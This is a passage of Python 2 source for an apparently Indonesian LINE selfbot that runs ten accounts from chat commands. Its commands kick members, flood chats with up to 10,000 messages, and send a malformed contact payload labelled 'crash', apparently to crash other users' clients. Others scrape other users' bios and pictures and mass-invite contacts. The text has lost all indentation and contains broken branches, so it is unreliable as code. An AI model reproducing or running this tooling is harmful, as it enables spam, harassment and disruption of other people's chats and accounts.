cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin and owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "c33b66e4b7709e54a6fe6eced6e57c157',"}
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Hmid)
k5.sendText(msg.to,Imid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================================
elif 'Lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('Lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'Wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("Wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'Kr restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'Ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'System':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'Kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'Cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'Instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("Instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'Music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('Music ','')
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'Clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'Clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'Link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'Link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'Ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'Group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
